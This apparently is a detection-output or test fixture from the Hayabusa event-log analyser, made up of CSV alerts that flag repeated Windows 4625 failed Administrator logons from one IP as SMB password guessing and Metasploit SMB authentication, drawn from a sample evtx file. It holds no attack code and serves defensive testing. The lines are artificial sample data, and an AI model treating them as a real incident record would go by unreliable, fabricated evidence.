+2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RwQgMM9H1oN4te9Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JbGILYTcFwtYbDk1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p5KzNsgWvyUhNEHd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KGvwbOtP3A5eDKCZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YZvtNNX511hIleST  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lJBRTeW6OQtNrt5u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Hovgq99STVt2GzrO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4kpT3gf0VCAVuVSa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tiB04AvkYp0PP3n1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PPluKgaiT10oC35V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8nCOM9uUeqv9QBx6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dSPrrNCh2FSWZKbI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aLDnCjr4pSdKAMX7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: G0UnmfB7lcXKEAvn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ogjMSxcUw7cF5dMa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 75uB8ejsSV5CbagM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5MMHLnyrzBQxluHn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5QXLn6fpmR52RBAz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KcdlrSUzcFNpaK5v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VJjiRO5rJzZ8XtqP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ncBraDdG2htkHjXU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Lo9DNrL44Z2S2SYR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QKcFiKC5QiIoHtxy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sqvq9GwuPCO15lUV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4XzgtJ3qUmkFiIY5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V1wc1Hjb4AK0Np1q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PKYNy0JyxIlFusMC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IrcKp13ut9M0pCi0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B3lJSH0r8iHAVhPF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ju3lCbvbwvkIKsBo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dQOHcZeAKQG6wHhC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QBPkgoKDLABqdSQb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wqj4xOCsJg1j3IIh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XhBIu6wUPHc3DZAy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W0fI1GhH5YTOHbNN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b7mLOWiojillZNYH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 37dknpwsl8j1WRWi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gzVum7a21sQe3fMt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JCFPSQmywelTXg74  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jCqb6TVV14hVX3NY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3qJsJrxVARedOdd3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s7iNkrkBNEbXPK0B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bio4zciNRolyeHc1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IFf1vN5MgAIsdZvx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zWhgUQSWAycVdYoS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ugHUJZuKHYfUHXWS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
